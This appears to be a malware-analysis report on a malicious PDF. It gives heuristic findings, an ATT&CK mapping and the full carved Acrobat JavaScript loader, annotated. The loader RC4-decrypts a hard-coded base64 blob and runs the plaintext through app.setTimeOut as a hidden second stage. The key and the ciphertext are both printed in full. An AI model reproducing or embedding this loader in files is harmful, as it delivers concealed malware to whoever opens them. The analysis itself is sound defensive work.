MALICIOUS
134
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell — caveat: nothing in the carved artifact is PowerShell. The visible layer is Acrobat JavaScript that stages a second script through app.setTimeOut, which maps to T1059.007 (Command and Scripting Interpreter: JavaScript); the PowerShell tag can only be confirmed once the RC4-encrypted second stage has been decrypted.
The PDF carries embedded JavaScript (heuristics PDF_JAVASCRIPT and PDF_JS), carved as 'javascript_obj0013_000.js'. The script is obfuscated only by name-mangling; its structure is readable: musevep() is a textbook RC4 (a 256-entry key-scheduling loop followed by the PRGA XOR loop), mosamis() is a base64 decoder that first strips every non-alphabet character, and the single top-level statement base64-decodes a hard-coded key, base64-decodes a roughly 4 KB blob, RC4-decrypts the blob with that key and passes the resulting string to app.setTimeOut(…, 200) — Acrobat's timer API, which evaluates a string argument as JavaScript after 200 ms. The actual second-stage logic is therefore inside the encrypted blob and is not visible in this listing. Because the key is hard-coded (the first literal base64-decodes to "rysULnquL46P2vWxz997gB99o"), the next stage can be recovered statically with a base64 decode followed by RC4, without executing the sample; whether it downloads or runs anything further cannot be determined from the visible layer alone.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER — PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script (the line is the RC4 decrypt routine, musevep; shown truncated):
function musevep(ketudin,dodutob){var kamafo=[],nofetidi8,sefapipitu=0,kotiturami8,ketitodil='',pakat;for(nofetidi8=0;nofetidi8<256;nofetidi8++){kamafo[nofetidi8]=nofetidi8;}for(nofetidi8=0;nofetidi8<256;nofetidi8++){sefapipitu=(sefapipitu+kamafo[nofetidi8]+ketudin.charCodeAt(nofetidi8%ketudin.length))%256;kotiturami8=kamafo[nofetidi8];kamafo[nofetidi8]=kamafo[sefapipitu];kamafo[sefapipitu]=kotiturami8;}nofetidi8=0;sefapipitu=0;for(pakat=0;pakat<dodutob.length;pakat++){nofetidi8=(nofetidi8+1)%25 … -
Embedded JS stream low PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_000.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x3CE | 5384 bytes |
SHA-256: 79b2b13a4cc9ab998b48e0ad1c5bad3b2f427065dc904a0ddb92b9b20e8644bd
Detection
ClamAV:
No threats found (a signature miss is unsurprising here: the visible layer is generic RC4 and base64 code, and the ciphertext blob is sample-specific, so a static signature has little to anchor on)
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 68 of 109 identifiers look randomly generated — consistent with name-mangling obfuscation. Note that the quoted example 'iZPCCKT4Wei9rtJF6lDTKjxpuRoTHjftp3n4pET8' is not an identifier: it is a substring of the base64 ciphertext blob, so some of the 109 counted "identifiers" are likely blob fragments rather than names; the genuinely mangled names are the pronounceable pseudo-words such as musevep, mosamis, kamafo and sefapipitu. Carved artifact contains 1 long base64-like blob(s) — the RC4 ciphertext passed to mosamis, roughly 4 KB.
|
|||
Preview script — first 1,000 lines of the extracted script (the listing below appears to show the entire carved stream; its long lines are presumably wrapped for display, since a raw line break inside a JavaScript string literal would be a syntax error)
// Carved Acrobat JavaScript (PDF /JS object 13), reformatted for analysis.
// Three units: musevep() is RC4 (key scheduling, then the PRGA XOR loop),
// mosamis() is a hand-rolled base64 decoder, and the one top-level statement
// RC4-decrypts a hard-coded blob and hands the plaintext STRING to
// app.setTimeOut(), which Acrobat compiles and runs as JavaScript after
// 200 ms -- a string-eval primitive.  The real second stage is inside the
// encrypted blob and is not visible here.  Do not execute outside a sandbox.
// `var` is kept throughout: the target engine is Acrobat's (older) JS.

// RC4.  ketudin = key string, dodutob = ciphertext string.  Returns the
// plaintext as a string whose char codes are the XOR-ed bytes (0..255).
function musevep(ketudin, dodutob) {
  var S = [];
  var i;
  var j = 0;
  var tmp;
  var out = '';
  var n;
  // Key-scheduling: identity permutation, then 256 key-driven swaps.
  for (i = 0; i < 256; i++) {
    S[i] = i;
  }
  for (i = 0; i < 256; i++) {
    j = (j + S[i] + ketudin.charCodeAt(i % ketudin.length)) % 256;
    tmp = S[i];
    S[i] = S[j];
    S[j] = tmp;
  }
  // PRGA: one keystream byte per input char, XOR-ed into the char code.
  i = 0;
  j = 0;
  for (n = 0; n < dodutob.length; n++) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    tmp = S[i];
    S[i] = S[j];
    S[j] = tmp;
    out += String.fromCharCode(dodutob.charCodeAt(n) ^ S[(S[i] + S[j]) % 256]);
  }
  return out;
}

// Base64 decoder.  Strips every character outside the base64 alphabet
// first (so a blob broken up by whitespace or other noise still decodes),
// pads to a multiple of four, then unpacks each quartet into up to three
// char codes.  '=' sits at index 64 of the alphabet and marks padding.
// NOTE: the loop index `rimila` is assigned without `var`, exactly as in
// the original, so it leaks as a global -- kept to preserve behaviour.
function mosamis(tosupi) {
  tosupi = tosupi.replace(/[^a-z0-9\+\/=]/ig, '');
  var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  var byte1, byte2, byte3;      // decoded bytes of the current quartet
  var s1, s2, s3, s4;           // the four sextets
  var chunks = [];
  var count = 0;
  while ((tosupi.length % 4) != 0) {
    tosupi += '=';
  }
  for (rimila = 0; rimila < tosupi.length; rimila += 4) {
    s1 = alphabet.indexOf(tosupi.charAt(rimila));
    s2 = alphabet.indexOf(tosupi.charAt(rimila + 1));
    s3 = alphabet.indexOf(tosupi.charAt(rimila + 2));
    s4 = alphabet.indexOf(tosupi.charAt(rimila + 3));
    byte1 = (s1 << 2) | (s2 >> 4);
    byte2 = ((s2 & 15) << 4) | (s3 >> 2);
    byte3 = ((s3 & 3) << 6) | s4;
    chunks[count++] = String.fromCharCode(byte1);
    // Padding sextets (index 64) carry no data.
    if (s3 != 64) chunks[count++] = String.fromCharCode(byte2);
    if (s4 != 64) chunks[count++] = String.fromCharCode(byte3);
  }
  return chunks.join('');
}

// Stage-2 launcher.  The first literal base64-decodes to the RC4 key
// ("rysULnquL46P2vWxz997gB99o"); the second is ~4 KB of base64 whose RC4
// plaintext is passed as a *string* to app.setTimeOut, so Acrobat evaluates
// it as JavaScript 200 ms later.  The line breaks inside the second literal
// mirror the report preview; they are presumably display wrapping (a raw
// newline would be a syntax error) -- TODO confirm against the carved file.
var nudod = app.setTimeOut(
  musevep(
    mosamis("cnlzVUxucXVMNDZQMnZXeHo5OTdnQjk5bw=="),
    mosamis("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")
  ),
  200
);
|
|||